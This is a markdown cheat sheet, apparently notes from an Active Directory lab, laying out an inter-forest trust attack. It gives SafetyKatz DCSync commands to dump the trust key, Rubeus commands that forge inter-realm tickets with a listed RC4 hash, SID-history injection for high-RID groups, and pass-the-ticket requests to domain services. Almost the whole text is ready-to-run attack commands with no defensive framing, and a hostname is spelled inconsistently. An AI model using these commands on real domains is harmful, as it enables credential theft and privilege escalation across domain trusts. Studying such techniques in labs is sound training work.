# trust-key

## Methodology

1. Dump the trust key of the child domain.
2. Check if SID Filtering is enabled.
3. Forge an inter-forest ticket.
4. Inject the ticket.
5. Enumerate group RID > 1000 on the target domain.
6. Forge an inter-forest ticket with special SIDS.
7. Inject the ticket

## Powershell

> \[!INFO] Remember to follow the Powershell methodology

## AD Module

**Check if SID Filtering is enabled:**

```powershell
Get-ADTrust -Filter *
```

**Look for groups with RID higher than 1000 in the target machine:**

```powershell
Get-ADGroup -Filter 'SID -ge "S-1-5-21-4066061358-3942393892-617142613-1000"' -Server euvendor.local
```

## Binaries

> \[!INFO] Remember to follow the Binaries methodology

### SafetyKatz

**Dump trust key for the inter-forest trust:**

```batchfile
SafetyKatz.exe '"lsadump::dcsync /user:eu\euvendor$"'
```

## Rubeus

**Forge an inter-realm TGT:**

```batchfile
Rubeus.exe silver /user:Administrator /ldap /service:krbtgt/eu.local /rc4:b96659c7b2109d2e63e6de676d48646c /sid:S-1-5-21-3657428294-2017276338-1274645009 /nowrap 
```

**Inject the ticket:**

```batchfile
Rubeus.exe asktgs /ticket:doIFEzCCBQ /service:CIFS/euvendor-dc.euvendor.local /dc:euvendordc.euvendor.local /ptt
```

> \[!INFO] We can only access specific resources that are explicitly shared!

**Forge a TGS using inter-realm TGT:**

```batchfile
Rubeus.exe asktgs /service:http/euvendornet.euvendor.local /dc:euvendor-dc.euvendor.local /ptt /ticket:doIFOzCCBT...
```

**Inject SID history of group with RID > 1000:**

```batchfile
Rubeus.exe silver /user:Administrator /ldap /service:krbtgt/eu.local /rc4:b96659c7b2109d2e63e6de676d48646c /sids:S-1-5-21-4066061358-3942393892-617142613-1103 /nowrap
```

**Request TGS with the TGT:**

```batchfile
Rubeus.exe asktgs /service:http/euvendornet.euvendor.local /dc:euvendor-dc.euvendor.local /ptt /ticket:doIFOzCCBT...
```